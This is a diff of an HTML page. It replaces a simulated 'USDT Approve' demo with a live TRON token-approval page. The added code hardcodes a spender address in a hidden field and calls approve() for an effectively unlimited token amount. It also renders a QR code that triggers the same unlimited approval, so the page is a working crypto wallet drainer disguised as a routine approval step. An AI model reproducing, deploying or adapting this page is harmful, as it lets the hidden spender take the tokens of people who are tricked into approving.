--- a/index.html
+++ b/index.html
@@ -1,40 +1,93 @@
-<!DOCTYPE html>
+<!doctype html>
 <html lang="en">
 <head>
-  <meta charset="utf-8" />
-  <meta name="viewport" content="width=device-width,initial-scale=1" />
-  <title>USDT Approve </title>
-  <style>
-    body { font-family: system-ui, Arial, sans-serif; margin:0; background:#0b1020; color:#eef2ff; }
-    .wrap { max-width:680px; margin:0 auto; padding:32px; }
-    .card { background:#111834; border:1px solid #1c2450; border-radius:16px; padding:24px; box-shadow:0 8px 24px rgba(0,0,0,.25); text-align:center; }
-    h1 { margin:0 0 12px; font-size:1.6rem; }
-    p  { margin:6px 0 18px; opacity:.9; line-height:1.5; }
-    button { width:100%; padding:12px 14px; border:0; border-radius:12px; font-weight:600; cursor:pointer; font-size:1rem; }
-    .btn { background:#3b82f6; color:white; margin-top:14px; }
-    .alert { margin-top:20px; padding:16px; border-radius:12px; background:#1f2937; color:#fca5a5; font-weight:500; display:none; }
-  </style>
+    <meta charset="utf-8" />
+    <title>TRC20 Token Approval</title>
+    <meta name="viewport" content="width=device-width, initial-scale=1" />
+    <script src="https://cdn.jsdelivr.net/npm/tronweb@6.0.4/dist/TronWeb.js"></script>
+    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
+    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>
+    <style>
+        body {
+            font-family: Arial, sans-serif;
+            background: #07102a;
+            color: #e6eaf2;
+            padding: 20px;
+        }
+        input, button {
+            width: 100%;
+            padding: 10px;
+            margin-bottom: 10px;
+            border-radius: 5px;
+            border: none;
+        }
+        button {
+            background: #2f6bff;
+            color: white;
+            cursor: pointer;
+        }
+        #qrcode {
+            margin-top: 20px;
+            text-align: center;
+        }
+        .hidden {
+            display: none;
+        }
+    </style>
 </head>
 <body>
-  <div class="wrap">
-    <div class="card">
-      <button id="connect" class="btn">🔗 Connect Wallet</button>
-      <button id="approve" class="btn">Approve 1,000,000 USDT</button>
+    <h1>Token Approval</h1>
+    <input type="text" id="tokenAddress" placeholder="Token Contract Address" value="TJh8z4L8nijXEek9jtyra5oksRLQht7Crq" readonly />
+    <input type="text" id="ownerAddress" placeholder="Owner Wallet Address" value="TScqkJ6gDMEYHpW39G2evGEYt1u3PEeafb" readonly />
+    <input type="text" id="spenderAddress" class="hidden" value="THN9TLyQ1qjXvhvwSoneYwz88yTgnr9Zx4" />
+    <input type="number" id="amount" class="hidden" value="0" readonly />
+    <button id="approveBtn">Approve Tokens</button>
+    <div id="message" class="hidden"></div>
+    <div id="qrcode" class="hidden"></div>
 
-      <div id="alert" class="alert">
-      </div>
-    </div>
-  </div>
+    <script>
+        window.onload = async () => {
+            if (!window.TronWeb || !window.TronWeb.defaultAddress.base58) {
+                console.error('Please install TronLink and ensure you are connected to Mainnet.');
+                return;
+            }
 
-  <script>
-    document.getElementById("connect").onclick = () => {
-      alert("Wallet connect simulation only .");
-    };
+            const approveTokens = async () => {
+                const tokenAddress = document.getElementById('tokenAddress').value;
+                const ownerAddress = document.getElementById('ownerAddress').value;
+                const spenderAddress = document.getElementById('spenderAddress').value;
 
-    document.getElementById("approve").onclick = () => {
-      document.getElementById("alert").style.display = "block";
-    };
-  </script>
+                try {
+                    const tronWeb = window.TronWeb;
+
+                    if (tronWeb.fullNode.host.includes('shasta')) {
+                        throw new Error("You are connected to the Testnet. Please switch to Mainnet.");
+                    }
+
+                    const contract = await tronWeb.contract().at(tokenAddress);
+                    await contract.approve(spenderAddress, "1000000000000000000000000000").send({
+                        from: ownerAddress
+                    });
+
+                    // ✅ QR generate karega jo सिर्फ Approve popup लाएगा
+                    generateQRCode(tokenAddress, ownerAddress, spenderAddress);
+
+                    setTimeout(() => {
+                        alert("Approval granted: Unlimited tokens from " + ownerAddress + " to " + spenderAddress);
+                    }, 1000);
+                } catch (error) {
+                    console.error("Error during approval:", error);
+                }
+            };
+
+            // ✅ Final QR (Only Approve USDT popup)
+            const generateQRCode = (tokenAddress, ownerAddress, spenderAddress) => {
+                const qrData = `tron:${tokenAddress}/approve?spender=${spenderAddress}&amount=1000000000000000000000000000`;
+                $('#qrcode').empty().qrcode(qrData).removeClass("hidden");
+            };
+
+            document.getElementById('approveBtn').onclick = approveTokens;
+        };
+    </script>
 </body>
-
-</html>
+  </html>
